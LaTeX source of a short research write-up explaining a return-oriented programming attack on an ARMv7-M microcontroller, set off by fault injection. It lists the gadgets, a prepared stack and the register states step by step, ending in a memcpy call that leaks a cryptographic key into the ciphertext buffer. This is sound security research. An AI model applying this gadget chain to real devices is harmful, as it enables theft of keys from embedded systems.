\documentclass[10pt,a4paper]{article}
\usepackage[utf8]{inputenc}
\usepackage[english]{babel}
\usepackage{amsmath}
\usepackage{color}
\usepackage{amsfonts}
\usepackage{amssymb}
\usepackage{graphicx}
\usepackage{listings}
\usepackage{hyperref}
\usepackage{chngcntr}
\usepackage[table]{xcolor}
\usepackage{adjustbox}

\newcommand{\TODO}[1]{\textbf{\textcolor{blue}{{TODO: #1}}}}

\AtBeginDocument{% the counter is defined later
  \counterwithout{lstlisting}{section}%
}
\makeatletter
\renewcommand{\l@lstlisting}[2]{%
  \@dottedtocline{1}{0em}{1.5em}{\lstlistingname\ #1}{#2}%
}

\title{ROP explanation on ARMv7M}
\author{Sebanjila K. Bukasa}


\begin{document}
\maketitle

Activating the ROP has some prerequisites.
First of all, the stack must be filled with the ROP data (the branches to gadgets) and the Stack Pointer (SP) correctly positioned.

In our setup the stack has been filled at the current stack pointer with the adequate value. In a real attack, this part may be tricky.


\begin{lstlisting}[caption={ROP activation (assembly)},label={code:rop_outbreak_asm}]
        ...
080003dc <some_function>:
 80003dc:	e006     b.n 80003ec <some_other_function>
 80003de:	46c0     nop
        ...
080003e2 <first_gadget>:
 80003e2:	4c01     ldr r4, [pc, #4] ; (80003e8)
 80003e4:	46a6     mov lr, r4
 80003e6:	bd07     pop {r0, r1, r2, pc}
 80003e8:	0800039d .word 0x0800039d
        ...
\end{lstlisting}

As our test application is not big enough, some gadgets where missing. In particular, the first one has to be manually added: save Link Register (LR) required to return to the normal program flow after the attack. Then set the PC from a value in (attacker controlled) stack to the next gadget.

The ROP activation happens when the program flow reach a function preceding the first gadget in memory as shown in listing~\ref{code:rop_outbreak_asm}.
Instruction at \verb|0x80003dc| is skipped.

A NOP is present in listing~\ref{code:rop_outbreak_asm} to illustrate a difficulty with the fault injection. As clearly explained in~\cite{EM_model}, the fetch stage always load 32-bits of instruction (here corresponding to two instruction). Hence a fault may alter two instruction simultaneously, increasing the probability to get a crash, depending on the alignment of the instructions.
Indeed in our first experiments, the alignment was not correct and caused the fault to impact two instructions: the first instruction of the first gadget was not properly executed.

Here is an example on how gadgets works, in the preliminary phase the controlled stack contains necessary values:
\begin{lstlisting}[caption={Stack state before activation},label={code:rop_stack_beginning}]
0x20001f70 xxxxxxxx xxxxxxxx xxxxxxxx 080008bd
0x20001f80 xxxxxxxx xxxxxxxx 20000ac8 000000f3
0x20001f90 xxxxxxxx 080020c1 0000ffff xxxxxxxx
0x20001fa0 20000a1c 08007f0b xxxxxxxx xxxxxxxx
0x20001fb0 0800039d 00000010 080003a3 08005e81
0x20001fc0 40011000 00000000 00000064 00000001
0x20001fd0 20000a74 20000ab4 40011000 20000ab4
0x20001fe0 08008ba9 20000ab4 00000010 00000010
0x20001ff0 00000010 20000ab4 08008c33 57d49195
\end{lstlisting}

\verb|0xXXXXXXXX| values are useless, they appears to have no side effects and are only for padding, necessary to execute gadgets in proper way.

As shown in~\ref{code:rop_outbreak_asm} at \verb|0x80003e8| pop will assign values to registers:
\begin{lstlisting}[caption={Registers state at ROP activation},label={code:registers_at_rop}]
(0) r0 (/32): 0xXXXXXXXX    ; popped from stack @ 0x20001f70
(1) r1 (/32): 0xXXXXXXXX    ; popped from stack @ 0x20001f74
(2) r2 (/32): 0xXXXXXXXX    ; popped from stack @ 0x20001f78
 ...
(13) sp (/32): 0x20001F80
(15) pc (/32): 0x080008BC   ; popped from stack @ 0x20001f7c
\end{lstlisting}

Addresses are automatically realigned, as in ARMv7m instruction set, a bit is used to specify decoding mode 16 or 32 bits used at runtime.

\begin{lstlisting}[caption={Chaining gadgets},label={code:stack_before_rop}]
  <second_gadget>:
 80008bc:	b002      	add	sp, #8
 80008be:	bd70      	pop	{r4, r5, r6, pc}
  <third_gadget>:
 80020c0:	4620      	mov	r0, r4
 80020c2:	bd38      	pop	{r3, r4, r5, pc}
\end{lstlisting}
After execution of first gadget:
\begin{lstlisting}[caption={Registers state after 2nd gadget},label={code:registers_stage_2}]
(4) r4 (/32): 0x20000AC8    ; popped from stack @ 0x20001f88
(5) r5 (/32): 0xXXXXXXXX    ; popped from stack @ 0x20001f8c
(6) r6 (/32): 0xXXXXXXXX    ; popped from stack @ 0x20001f90
 ...
(13) sp (/32): 0x20001F98   ; add sp, #8 and 4 values popped
 ...
(15) pc (/32): 0x080020C0   ; popped from stack @ 0x20001f94
\end{lstlisting}
\begin{lstlisting}[caption={Registers state after 3rd gadget},label={code:registers_stage_3}]
(0) r0 (/32): 0x20000AC8    ; mov r0, r4
 ...
(3) r3 (/32): 0x0000FFFF    ; popped from stack @ 0x20001f98
(4) r4 (/32): 0xXXXXXXXX    ; popped from stack @ 0x20001f9c
(5) r5 (/32): 0x20000A1C    ; popped from stack @ 0x20001fa0
 ...
(13) sp (/32): 0x20001FA8   ; 4 values popped from stack
 ...
(15) pc (/32): 0x08007F0A   ; popped from stack @ 0x20001fa4
\end{lstlisting}

Chaining those two gadgets allow us to fill r0 and r3 with desired values. Then there is other gadgets to fill r0 to r3 which are necessary to complete our behaviour.

\begin{lstlisting}[caption={Registers state after loading phase},label={code:registers_loading}]
(0) r0 (/32): 0x20000AC8    ; ciphertext buffer
(1) r1 (/32): 0x20000A1C    ; key buffer
(2) r2 (/32): 0x00000010    ; size
 ...
(15) pc (/32): 0x08005E80   ; memcpy function
\end{lstlisting}

Next gadget is a jump to memcpy function with those parameters, and the last one is a return to normal execution. Finally, the attack succeeded as the key was read in the ciphertext buffer, with no error on other functionalities.


\end{document}
